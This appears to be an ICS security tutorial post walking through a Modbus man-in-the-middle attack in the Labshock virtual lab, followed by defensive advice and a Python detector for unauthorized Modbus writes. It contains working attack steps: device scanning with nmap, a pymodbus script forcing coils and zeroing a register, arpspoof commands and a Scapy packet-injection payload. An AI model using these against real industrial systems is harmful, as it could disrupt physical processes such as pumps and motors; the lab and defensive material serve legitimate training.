Modbus Man-in-the-Middle Attack: Exploiting ICS/OT Security


Modbus, one of the oldest industrial protocols (since 1979), remains widely used in factories, energy systems, and critical infrastructure. Despite its simplicity and speed, Modbus lacks encryption and authentication, making it highly vulnerable to attacks. This article explores a Modbus Man-in-the-Middle (MitM) attack using Labshock, a virtual ICS/OT security lab.

What’s Covered in the Lab?

✅ Modbus Theory & Basics

  • RTU vs. TCP vs. ASCII
  • Master/Slave architecture
  • Common function codes

✅ Working with Modbus Data

  • Coils (binary control)
  • Input & Holding Registers (sensor data)
  • Wireshark packet analysis

✅ Hands-On Labshock Demo

  • Simulate Modbus devices
  • Python scripting with `pymodbus`
  • Read/Write coils & registers

✅ Modbus Attack Walkthrough

  • Scanning for Modbus devices
  • Writing malicious coil values (e.g., stopping a pump)
  • Altering register values (e.g., changing motor speed)

✅ New: Man-in-the-Middle Attack

  • Intercepting SCADA-PLC traffic
  • Real-time packet manipulation
  • No authentication = Easy exploitation

You Should Know: Practical Exploitation Steps

1. Setting Up Labshock

git clone https://github.com/zakharb/labshock
cd labshock
docker-compose up -d   # Deploys the Modbus simulation containers

2. Scanning for Modbus Devices

nmap -p 502 --script modbus-discover.nse 192.168.1.0/24 

3. Python Exploitation (pymodbus)

from pymodbus.client import ModbusTcpClient

client = ModbusTcpClient('192.168.1.100')  # Target PLC
client.connect()
client.write_coil(0, True)       # Force a coil ON (e.g., stop pump)
client.write_register(1, 0)      # Set motor speed to 0
client.close()

4. Wireshark Traffic Analysis

wireshark -k -i eth0 -Y "modbus" 

5. ARP Spoofing for MitM

arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100   # SCADA <-> PLC

6. Modbus Packet Manipulation (Scapy)

from scapy.all import TCP, sendp

def modify_modbus(pkt):
    # Only touch Modbus/TCP requests (server port 502)
    if pkt.haslayer(TCP) and pkt.dport == 502:
        pkt.load = b"\x00\x01\x00\x00\x00\x06\x01\x06\x00\x01\x00\x00"  # Malicious write
        sendp(pkt, iface="eth0")

What Undercode Says

Modbus remains a critical yet insecure protocol in ICS/OT environments. Because the protocol has neither encryption nor authentication, anyone on the network path can intercept and manipulate traffic. Defenders must:

  • Segment Modbus traffic (VLANs, firewalls)
  • Monitor for abnormal writes (OT SIEM rules)
  • Consider secure alternatives (Modbus/TLS, MQTT)
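
As an added example (not part of the original post or the Labshock project), the following Python decodes the Modbus/TCP frame used in the Scapy step and flags state-changing function codes from hosts outside an assumed authorized-master list, which is the kind of "abnormal write" rule an OT SIEM would carry. The sample frames and the 192.168.1.77 rogue address are constructed; 192.168.1.50 is the lab's SCADA host.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Function codes that change process state; a read-only HMI never needs them.
WRITE_FUNCTION_CODES = {5: "Write Single Coil", 6: "Write Single Register",
                        15: "Write Multiple Coils", 16: "Write Multiple Registers"}

@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int
    function_code: int
    address: int   # starting coil/register address
    value: int     # written value (FC 5/6) or quantity (other FCs)

def parse_modbus_tcp(frame: bytes) -> ModbusRequest:
    """Decode a Modbus/TCP request: 7-byte MBAP header, then the PDU."""
    if len(frame) < 12:
        raise ValueError("frame too short for MBAP header plus a 5-byte PDU")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"unexpected protocol identifier {proto}")
    if length != len(frame) - 6:   # length counts unit id + PDU bytes
        raise ValueError("MBAP length field does not match frame size")
    address, value = struct.unpack(">HH", frame[8:12])
    return ModbusRequest(tid, unit, frame[7], address, value)

def check_write(frame: bytes, src_ip: str, authorized: set) -> Optional[str]:
    """Alert on a write request from a host not in the authorized-master set."""
    req = parse_modbus_tcp(frame)
    name = WRITE_FUNCTION_CODES.get(req.function_code)
    if name is None or src_ip in authorized:
        return None
    return (f"ALERT: {src_ip} sent {name} (FC {req.function_code}) to unit "
            f"{req.unit_id} address {req.address} value {req.value:#06x}")

# Constructed sample frames: the first is the payload from the Scapy step above.
MALICIOUS_WRITE = bytes.fromhex("000100000006010600010000")  # FC 6, register 1 := 0
READ_REGISTERS = bytes.fromhex("00020000000601030000000a")   # FC 3, read 10 registers
COIL_ON = bytes.fromhex("00030000000601050000ff00")          # FC 5, coil 0 := ON
AUTHORIZED_MASTERS = {"192.168.1.50"}   # the lab's SCADA host (assumed authorized)

if __name__ == "__main__":
    for ip, frame in [("192.168.1.50", READ_REGISTERS), ("192.168.1.50", COIL_ON),
                      ("192.168.1.77", MALICIOUS_WRITE)]:   # .77 is a constructed rogue host
        print(check_write(frame, ip, AUTHORIZED_MASTERS))
```

Under the ARP-spoofing MitM above the forged frame still carries the SCADA host's own source address, so a source-IP allowlist alone will not catch it; baseline which function codes and register ranges each master normally writes and alert on deviations from that baseline.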

Expected Output:

  • Successful MitM interception in Wireshark
  • Coil/register values altered without authentication
  • Python scripts executing malicious writes


Reported By: Zakharb Full – Hackers Feeds